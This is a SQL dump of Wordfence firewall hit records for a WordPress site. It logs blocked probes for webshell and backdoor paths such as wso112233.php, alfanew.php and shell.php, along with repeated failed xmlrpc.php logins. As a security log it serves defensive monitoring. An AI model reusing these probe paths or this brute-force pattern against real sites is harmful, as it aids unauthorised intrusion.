(50417, 1711262361.235818, 1711262360.841200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ÿ/', 0, 403, 0, 0, 0, 'https://happythinking.howequipmentworks.com/simple.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NpbXBsZS5waHA=","category":"brute-force","ssl":1}'),
(50301, 1711080766.565115, 1711080766.274400, '\0\0\0\0\0\0\0\0\0\0ÿÿ›…\Z)', 0, 403, 0, 0, 0, 'https://www.happythinking.com/repeater.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3JlcGVhdGVyLnBocA==","category":"brute-force","ssl":1}'),
(50989, 1712208175.395522, 1712208174.897400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wso112233.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzbzExMjIzMy5waHA=","category":"brute-force","ssl":1}'),
(51054, 1712316537.028286, 1712316536.641000, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/RxRmixvj.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL1J4Um1peHZqLnBocA==","category":"brute-force","ssl":1}'),
(50990, 1712208157.818768, 1712208157.369400, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-sigunq.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLXNpZ3VucS5waHA=","category":"brute-force","ssl":1}'),
(51170, 0.000000, 1712319451.236320, '\0\0\0\0\0\0\0\0\0\0ÿÿwR^z', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51171, 0.000000, 1712319452.098779, '\0\0\0\0\0\0\0\0\0\0ÿÿ1%qI', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(50991, 1712208140.431426, 1712208140.076200, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/makeasmtp.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L21ha2Vhc210cC5waHA=","category":"brute-force","ssl":1}'),
(51010, 1712231000.333217, 1712230999.657600, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 0, 403, 0, 0, 0, 'https://happythinking.com/', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"Lw==","category":"brute-force","ssl":1}'),
(51007, 1712231003.445090, 1712231002.757100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 0, 403, 0, 0, 0, 'https://happythinking.com/plugins/content/apismtp/apismtp.php?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3BsdWdpbnMvY29udGVudC9hcGlzbXRwL2FwaXNtdHAucGhw","category":"brute-force","ssl":1}'),
(51008, 1712231002.368125, 1712231001.459100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 0, 403, 0, 0, 0, 'https://happythinking.com/alfacgiapi/perl.alfa', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFjZ2lhcGkvcGVybC5hbGZh","category":"brute-force","ssl":1}'),
(51029, 0.000000, 1712305061.698166, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51028, 0.000000, 1712302961.440782, '\0\0\0\0\0\0\0\0\0\0ÿÿÁÞ`', 0, 503, 0, 0, 0, 'https://www.happythinking.com/wp-login.php', '', 'Mozilla/5.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL);
INSERT INTO `wpou_wfhits` VALUES
(51343, 0.000000, 1712320232.287410, '\0\0\0\0\0\0\0\0\0\0ÿÿž>>@', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51036, 1712310114.970395, 1712310114.652900, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/ws.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dzLnBocA==","category":"brute-force","ssl":1}'),
(51025, 1712288976.169693, 1712288975.840500, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-login.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWxvZ2luLnBocA==","category":"brute-force","ssl":1}'),
(51009, 1712231001.841783, 1712231001.113100, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹;»', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/apikey/apikey.php?test=hello', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9hcGlrZXkvYXBpa2V5LnBocA==","category":"brute-force","ssl":1}'),
(51047, 1712316551.846971, 1712316551.567500, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/core-stab/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIvaW5kZXgucGhw","category":"brute-force","ssl":1}'),
(51038, 1712310110.930239, 1712310110.633800, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/bypass.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2J5cGFzcy5waHA=","category":"brute-force","ssl":1}'),
(51023, 1712288979.897724, 1712288979.577700, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/epinyins.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2VwaW55aW5zLnBocA==","category":"brute-force","ssl":1}'),
(51024, 1712288977.893673, 1712288977.571400, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/plugins/x/index.php', 'www.google.com', 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvcGx1Z2lucy94L2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(51037, 1712310113.078822, 1712310112.735900, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/shell.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3NoZWxsLnBocA==","category":"brute-force","ssl":1}'),
(50985, 1712208241.044327, 1712208240.447900, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/install.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2luc3RhbGwucGhw","category":"brute-force","ssl":1}'),
(51056, 1712316532.766177, 1712316532.375100, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/RxRpcodx.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L1J4UnBjb2R4LnBocA==","category":"brute-force","ssl":1}'),
(51055, 1712316534.797163, 1712316534.498000, '\0\0\0\0\0\0\0\0\0\0ÿÿõÍ`', 0, 403, 0, 0, 0, 'https://happythinking.com/wp-content/themes/classic/inc/index.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWNvbnRlbnQvdGhlbWVzL2NsYXNzaWMvaW5jL2luZGV4LnBocA==","category":"brute-force","ssl":1}'),
(50988, 1712208193.454362, 1712208193.056600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/wp-atom.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L3dwLWF0b20ucGhw","category":"brute-force","ssl":1}'),
(50987, 1712208224.898160, 1712208224.420800, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/alfanew.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2FsZmFuZXcucGhw","category":"brute-force","ssl":1}'),
(50986, 1712208230.542517, 1712208229.771600, '\0\0\0\0\0\0\0\0\0\0ÿÿ[\\ðD', 0, 403, 0, 0, 0, 'https://www.happythinking.howequipmentworks.com/fw.php', NULL, 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'blocked:waf', 'Known malicious User-Agents', '{"learningMode":0,"failedRules":"307","paramKey":"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd","paramValue":"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=","path":"L2Z3LnBocA==","category":"brute-force","ssl":1}'),
(51133, 0.000000, 1712319253.131358, '\0\0\0\0\0\0\0\0\0\0ÿÿuþ#ª', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51134, 0.000000, 1712319253.936185, '\0\0\0\0\0\0\0\0\0\0ÿÿO§6Ú', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51135, 0.000000, 1712319254.841282, '\0\0\0\0\0\0\0\0\0\0ÿÿsa\0', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51136, 0.000000, 1712319263.427265, '\0\0\0\0\0\0\0\0\0\0ÿÿgÇÈ­', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51137, 0.000000, 1712319270.151650, '\0\0\0\0\0\0\0\0\0\0ÿÿÅýFJ', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51138, 0.000000, 1712319270.246745, '\0\0\0\0\0\0\0\0\0\0ÿÿ1$¼…', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51139, 0.000000, 1712319270.724930, '\0\0\0\0\0\0\0\0\0\0ÿÿ«LV', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51140, 0.000000, 1712319273.099531, '\0\0\0\0\0\0\0\0\0\0ÿÿgU›', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51141, 0.000000, 1712319282.974261, '\0\0\0\0\0\0\0\0\0\0ÿÿV}’È', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51142, 0.000000, 1712319288.038982, '\0\0\0\0\0\0\0\0\0\0ÿÿº_=Ô', 0, 503, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(51143, 0.000000, 1712319292.979470, '\0\0\0\0\0\0\0\0\0\0ÿÿz«', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
(51144, 0.000000, 1712319299.617793, '\0\0\0\0\0\0\0\0\0\0ÿÿºû®ï', 0, 200, 0, 0, 0, 'https://www.happythinking.com/xmlrpc.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko', 'loginFailInvalidUsername', NULL, NULL),
